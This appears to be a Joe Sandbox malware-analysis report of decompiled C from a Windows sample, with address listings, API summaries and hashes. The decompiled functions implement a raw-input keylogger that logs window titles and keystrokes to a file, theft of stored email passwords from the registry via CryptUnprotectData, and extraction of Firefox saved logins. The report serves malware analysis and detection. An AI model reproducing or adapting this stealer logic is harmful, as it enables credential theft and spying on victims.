				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00251052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E00255ADB(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E0025312C( &_v644, _t195, L"Unknow");
											} else {
												E00253264( &_v648, E00253412( &_v636,  &_v564));
												E00255A2D(_v644);
											}
											E00258133( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E00253264( &_v632,  &_v644);
											_t93 =  *0x266690; // 0x0
											E00253297( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x266690; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E00251301(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0025345A(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0025345A(_t208 + 0xc,  &_v628);
												_t152 = E0025460B( &_v612, __eflags);
												_t189 =  *0x266690; // 0x0
												E00254B53( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E002545E1( &_v648);
												_t96 =  *0x266690; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x266690; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x266690; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E00253075( &_v648, E00253412( &_v636, _t101 + 0x210));
													E00255A2D(_v644);
													_t101 =  *0x266690; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x266690; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x266690; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x266690; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x266690; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x266690; // 0x0
													_t126 = E0025308E( &_v632);
													_t128 =  *0x266690; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x266690; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x266690; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x266690; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x266690; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x266690; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E0025804D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E0025804D( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x266690; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x266690; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E00255A2D(_v620);
											_v620 = _t198;
											E00255A2D(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E00255A2D(_t201);
				return _t198;
			}



































































                                      0x00257cc2
                                      0x00257ccf
                                      0x00257cd3
                                      0x00257cdb
                                      0x00257cde
                                      0x00257ce0
                                      0x00257ce4
                                      0x00257ce7
                                      0x00258010
                                      0x00258013
                                      0x0025801b
                                      0x0025801e
                                      0x00258028
                                      0x00258030
                                      0x00258035
                                      0x00257ced
                                      0x00257ced
                                      0x00257cf0
                                      0x00258006
                                      0x00257cf6
                                      0x00257cfb
                                      0x00257d18
                                      0x00257d26
                                      0x00257d2c
                                      0x00257d2f
                                      0x00257d3e
                                      0x00257d40
                                      0x00257d44
                                      0x00257d46
                                      0x00257d4e
                                      0x00257d5c
                                      0x00257d62
                                      0x00257d66
                                      0x00257d6c
                                      0x00257d73
                                      0x00257d8a
                                      0x00257d90
                                      0x00257d92
                                      0x00257dc0
                                      0x00257d94
                                      0x00257da7
                                      0x00257db0
                                      0x00257db0
                                      0x00257dcc
                                      0x00257dda
                                      0x00257ddf
                                      0x00257dec
                                      0x00257df1
                                      0x00257df6
                                      0x00257df8
                                      0x00257dfa
                                      0x00257dfd
                                      0x00257e05
                                      0x00257e11
                                      0x00257e16
                                      0x00257e22
                                      0x00257e2a
                                      0x00257e33
                                      0x00257e3c
                                      0x00257e41
                                      0x00257e4e
                                      0x00257e57
                                      0x00257e5c
                                      0x00257e5c
                                      0x00257e61
                                      0x00257e67
                                      0x00257e73
                                      0x00257e7c
                                      0x00257e7e
                                      0x00257e83
                                      0x00257ebe
                                      0x00257ec2
                                      0x00257ec2
                                      0x00257ec8
                                      0x00257ece
                                      0x00257ed3
                                      0x00257e85
                                      0x00257e99
                                      0x00257ea4
                                      0x00257ea9
                                      0x00257eae
                                      0x00257eb2
                                      0x00257eb4
                                      0x00000000
                                      0x00257eb6
                                      0x00257eb6
                                      0x00257eb6
                                      0x00257eb4
                                      0x00257ee8
                                      0x00257eee
                                      0x00257efa
                                      0x00257efd
                                      0x00257f03
                                      0x00257f0a
                                      0x00257f0d
                                      0x00257f14
                                      0x00257f1b
                                      0x00257f24
                                      0x00257f26
                                      0x00257f31
                                      0x00257f38
                                      0x00257f41
                                      0x00257f43
                                      0x00257f55
                                      0x00257f5d
                                      0x00257f66
                                      0x00257f68
                                      0x00257f6d
                                      0x00257f78
                                      0x00257f7f
                                      0x00257f88
                                      0x00257f8a
                                      0x00257f90
                                      0x00257f90
                                      0x00257f95
                                      0x00257f9c
                                      0x00257fa5
                                      0x00257fa7
                                      0x00257fa7
                                      0x00257fb1
                                      0x00257fc8
                                      0x00257fc8
                                      0x00257fcb
                                      0x00257fd1
                                      0x00257fd9
                                      0x00257fdb
                                      0x00257fe3
                                      0x00257fe3
                                      0x00257fed
                                      0x00257ff6
                                      0x00257ffa
                                      0x00257fff
                                      0x00257fff
                                      0x00257d73
                                      0x00257d66
                                      0x00257d46
                                      0x00257cfd
                                      0x00257d0f
                                      0x00257d0f
                                      0x00257cfb
                                      0x00257cf0
                                      0x0025803d
                                      0x0025804a

                                      APIs
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00257D09
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00257D26
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00257D5C
                                      • GetForegroundWindow.USER32 ref: 00257D79
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00257D8A
                                      • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00257E73
                                      • PostQuitMessage.USER32(00000000), ref: 00258006
                                      • RegisterRawInputDevices.USER32 ref: 00258035
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                      • String ID: Unknow
                                      • API String ID: 3853268301-1240069140
                                      • Opcode ID: 8d6e7914fe2bef65fffa2bea62fbe7de81dd619f7b480b6375866687cccf0871
                                      • Instruction ID: 86d58c84572dd9f7084801dd0b7cfa9f831b80d3b5ca71c04dd4d2649ebdf05c
                                      • Opcode Fuzzy Hash: 8d6e7914fe2bef65fffa2bea62fbe7de81dd619f7b480b6375866687cccf0871
                                      • Instruction Fuzzy Hash: 8AA18C71114202AFC704EF64EC99E6B7BE8FF85306F048518FD59932A1DBB0E928CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00258F40, Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E00258F40(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E00251130(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00251052( &_v292, 0, 0x104);
				E00251052( &_v556, 0, 0x104);
				E00251052( &_v820, 0, 0x104);
				E00251052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E0025312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E0025312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E0025312C( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E0025312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E0025312C( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00251052( &_v17204, _t124, 0x1000);
					E002592D8( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E0025312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00251052( &_v17204, _t130, 0x1000);
					E002592D8( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E0025312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00251052( &_v17204, _t136, 0x1000);
					E002592D8( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E0025312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00251052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00251052( &_v17204, _t142, 0x1000);
					E002592D8( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E0025312C( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E0025308E( &_v24) > 0) {
					E00251EB9(_t217 - 0x10,  &_v24);
					E00251EEF(_t180);
				}
				E0025138F( &_v24);
				return 1;
			}































                                      0x00258f40
                                      0x00258f40
                                      0x00258f48
                                      0x00258f52
                                      0x00258f5e
                                      0x00258f68
                                      0x00258f6d
                                      0x00258f6f
                                      0x00258f72
                                      0x00258f80
                                      0x00258f8e
                                      0x00258f9e
                                      0x00258fa3
                                      0x00258fa9
                                      0x00258fc6
                                      0x00258fd2
                                      0x00258fd2
                                      0x00258fe2
                                      0x00258fec
                                      0x00258ff1
                                      0x0025900d
                                      0x00259019
                                      0x00259019
                                      0x00259024
                                      0x00259030
                                      0x00259035
                                      0x00259051
                                      0x0025905d
                                      0x0025905d
                                      0x00259068
                                      0x00259074
                                      0x00259079
                                      0x00259095
                                      0x002590a1
                                      0x002590a1
                                      0x002590ac
                                      0x002590b8
                                      0x002590bd
                                      0x002590d9
                                      0x002590e5
                                      0x002590e5
                                      0x002590f0
                                      0x002590fc
                                      0x00259101
                                      0x00259119
                                      0x0025911b
                                      0x0025911d
                                      0x0025912c
                                      0x00259140
                                      0x00259145
                                      0x00259152
                                      0x00259152
                                      0x0025915d
                                      0x00259169
                                      0x0025916e
                                      0x00259186
                                      0x00259188
                                      0x0025918a
                                      0x00259199
                                      0x002591ad
                                      0x002591b2
                                      0x002591bf
                                      0x002591bf
                                      0x002591ca
                                      0x002591d6
                                      0x002591db
                                      0x002591f3
                                      0x002591f5
                                      0x002591f7
                                      0x00259206
                                      0x0025921a
                                      0x0025921f
                                      0x0025922c
                                      0x0025922c
                                      0x00259237
                                      0x00259243
                                      0x00259248
                                      0x00259260
                                      0x00259262
                                      0x00259264
                                      0x00259273
                                      0x00259287
                                      0x0025928c
                                      0x00259299
                                      0x00259299
                                      0x002592a1
                                      0x002592af
                                      0x002592ba
                                      0x002592c1
                                      0x002592c1
                                      0x002592c9
                                      0x002592d5

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,75F645DD,757992CF,00000000,?,00258F04), ref: 00258FC2
                                      • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,75F645DD,757992CF), ref: 00259009
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0025904D
                                      • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00259091
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 002590D5
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00259119
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00259186
                                      • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 002591F3
                                      • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00259260
                                        • Part of subcall function 002592D8: GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0025928C,00001000,?,00000000,00001000), ref: 002592F6
                                        • Part of subcall function 002592D8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0025928C), ref: 0025932C
                                        • Part of subcall function 002592D8: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00259363
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                      • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                      • API String ID: 6593746-2537589853
                                      • Opcode ID: 25a7dd5b7a599bd2bbc907e8c7af799bca2d755d698200dc7c7b54cb881ed341
                                      • Instruction ID: f94efc0f48ccf5990c346015c147290bf063669be80e2c3fff4266b5aff9b8ea
                                      • Opcode Fuzzy Hash: 25a7dd5b7a599bd2bbc907e8c7af799bca2d755d698200dc7c7b54cb881ed341
                                      • Instruction Fuzzy Hash: 0FA101B292021DBADF25EAA0DD45FDE737CAF14741F1001A5FA05F60C1E674AB988F68
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 002598B0, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E002598B0(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E00253412( &_v24, L"Profile");
				_t281 = 0;
				E00251052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E00251052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E0025ADBE(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E00253412(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0025345A(_t396, _t165);
					_t167 = E0025A6A6(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E00253297( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0025345A( &_v36,  &_a4);
						E00253297( &_v36, _t385, _t400, L"profiles.ini");
						E00253264( &_v24, E00253412( &_v40, L"Profile"));
						E00255A2D(_v40);
						E0025309F( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E00253264( &_v24, E00253412( &_v96, L"Profile"));
							E00255A2D(_v96);
							_v96 = _t281;
							E0025309F( &_v24, _t385, __eflags, _t389);
							E0025345A( &_v12,  &_a4);
							E00253297( &_v12, _t385, __eflags,  &_v1224);
							E00253381( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0025345A( &_v20,  &_v12);
										E00253297( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E0025D75B( &_v16, _t386, __eflags);
										E00253297( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E00253162( &_v16, __eflags, E002532D4( &_v56, _t385, __eflags));
										E00255A2D(_v56);
										_v56 = _t281;
										E00253297( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E00253264( &_v20,  &_v16);
											_t390 = _v20;
										}
										E0025DE6C( &_v184, __eflags);
										_t325 =  &_v180;
										E00253264(_t325,  &_v20);
										_push(_t325);
										_t207 = E0025E130( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0025DDDB( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E002531EC( &_v116, "encryptedUsername");
											_t217 = E00252D59( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E00258B5D(_t217, _t215, __eflags);
											_v120 = _t283;
											E00255A2D(_v160);
											_t336 = _v116;
											E00255A2D(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E002531EC( &_v128, "hostname");
													E00258B96( &_v88, E00252D59( &_v52,  &_v124), __eflags, _t230, _t394);
													E00255A2D(_v124);
													E00255A2D(_v128);
													_t236 = E002531EC( &_v136, "encryptedUsername");
													E00258B96( &_v84, E00252D59( &_v52,  &_v132), __eflags, _t236, _t394);
													E00255A2D(_v132);
													E00255A2D(_v136);
													_t242 = E002531EC( &_v144, "encryptedPassword");
													_t385 = E00252D59( &_v52,  &_v140);
													E00258B96( &_v80, _t244, __eflags, _t242, _t394);
													E00255A2D(_v140);
													E00255A2D(_v144);
													E00259E04(_t391, __eflags, _v84,  &_v72);
													E00259E04(_t391, __eflags, _v80,  &_v76);
													E00253264( &_v112, E00252ECA( &_v88, __eflags,  &_v60));
													E00255A2D(_v60);
													_v60 = 0;
													E00253264( &_v108, E00252ECA(E002531EC( &_v148, _v72), __eflags,  &_v64));
													E00255A2D(_v64);
													_v64 = 0;
													E00255A2D(_v148);
													E00253264( &_v104, E00252ECA(E002531EC( &_v152, _v76), __eflags,  &_v68));
													E00255A2D(_v68);
													_v68 = 0;
													E00255A2D(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E00251EB9(_t396,  &_v112);
													E00251EEF(_t391);
													E00255A2D(_v72);
													E00255A2D(_v76);
													E00255A2D(_v80);
													E00255A2D(_v84);
													E00255A2D(_v88);
													_t336 =  &_v112;
													E0025138F( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0025345A(_t396,  &_v16);
												E0025DEA9(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E00252E66( &_v52);
											_t327 =  &_v184;
										}
										E0025DE8B(_t327, __eflags);
										E00255A2D(_t393);
										_v16 = _t281;
										E00255A2D(_t390);
										_v20 = _t281;
										E00255A2D(_v28);
										E00255A2D(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E00255A2D(_v28);
								E00255A2D(_v12);
							}
							_v12 = _t281;
						}
						E0025A64F(_t392);
						_t281 = 1;
						E00255A2D(_v36);
					}
					E00255A2D(_v44);
				}
				E00255A2D(_v24);
				E00255A2D(_a4);
				return _t281;
			}







































































                                      0x002598b0
                                      0x002598bc
                                      0x002598c6
                                      0x002598c9
                                      0x002598d3
                                      0x002598dd
                                      0x002598e2
                                      0x002598e5
                                      0x002598ee
                                      0x002598f7
                                      0x002598fe
                                      0x00259911
                                      0x0025991e
                                      0x00259921
                                      0x00259932
                                      0x00259943
                                      0x00259949
                                      0x0025994d
                                      0x00259950
                                      0x002599be
                                      0x00259952
                                      0x00259952
                                      0x00259952
                                      0x00259954
                                      0x00259958
                                      0x0025995f
                                      0x00259964
                                      0x00259966
                                      0x00259974
                                      0x00259980
                                      0x0025998d
                                      0x002599a3
                                      0x002599ab
                                      0x002599b4
                                      0x00259dab
                                      0x002599c1
                                      0x002599ca
                                      0x002599d6
                                      0x002599de
                                      0x002599e7
                                      0x002599ea
                                      0x002599f6
                                      0x00259a05
                                      0x00259a11
                                      0x00259a19
                                      0x00259a1d
                                      0x00259a1f
                                      0x00259a36
                                      0x00259a3c
                                      0x00259a42
                                      0x00259a44
                                      0x00000000
                                      0x00259a46
                                      0x00259a4a
                                      0x00259a4d
                                      0x00259a50
                                      0x00259a52
                                      0x00000000
                                      0x00259a54
                                      0x00259a5b
                                      0x00259a68
                                      0x00259a6f
                                      0x00259a73
                                      0x00259a80
                                      0x00259a87
                                      0x00259a94
                                      0x00259a9c
                                      0x00259aa9
                                      0x00259aac
                                      0x00259ab1
                                      0x00259ab4
                                      0x00259ac0
                                      0x00259ac2
                                      0x00259acb
                                      0x00259ad0
                                      0x00259ad0
                                      0x00259ad9
                                      0x00259ae2
                                      0x00259ae8
                                      0x00259aed
                                      0x00259af9
                                      0x00259afe
                                      0x00259b04
                                      0x00259b06
                                      0x00259b16
                                      0x00259b1a
                                      0x00259b1d
                                      0x00259b2a
                                      0x00259b3b
                                      0x00259b40
                                      0x00259b4f
                                      0x00259b51
                                      0x00259b54
                                      0x00259b59
                                      0x00259b5c
                                      0x00259b61
                                      0x00259b63
                                      0x00259d36
                                      0x00259d36
                                      0x00259b69
                                      0x00259b69
                                      0x00259b6c
                                      0x00259b6c
                                      0x00259b6e
                                      0x00259b71
                                      0x00259b7a
                                      0x00259b7d
                                      0x00259b80
                                      0x00259b83
                                      0x00259b9a
                                      0x00259ba4
                                      0x00259bac
                                      0x00259bbd
                                      0x00259bd4
                                      0x00259bde
                                      0x00259be9
                                      0x00259bfa
                                      0x00259c0f
                                      0x00259c14
                                      0x00259c21
                                      0x00259c2c
                                      0x00259c3a
                                      0x00259c48
                                      0x00259c5d
                                      0x00259c65
                                      0x00259c6d
                                      0x00259c8a
                                      0x00259c92
                                      0x00259c9d
                                      0x00259ca0
                                      0x00259cc2
                                      0x00259cca
                                      0x00259cd5
                                      0x00259cd8
                                      0x00259cdd
                                      0x00259ce0
                                      0x00259ce9
                                      0x00259cf0
                                      0x00259cf8
                                      0x00259d00
                                      0x00259d08
                                      0x00259d10
                                      0x00259d18
                                      0x00259d1d
                                      0x00259d20
                                      0x00259d25
                                      0x00259d25
                                      0x00259d25
                                      0x00259d2e
                                      0x00259d31
                                      0x00259d31
                                      0x00259d39
                                      0x00259d3f
                                      0x00259d41
                                      0x00259d4a
                                      0x00259d4f
                                      0x00259d54
                                      0x00259d5e
                                      0x00259d68
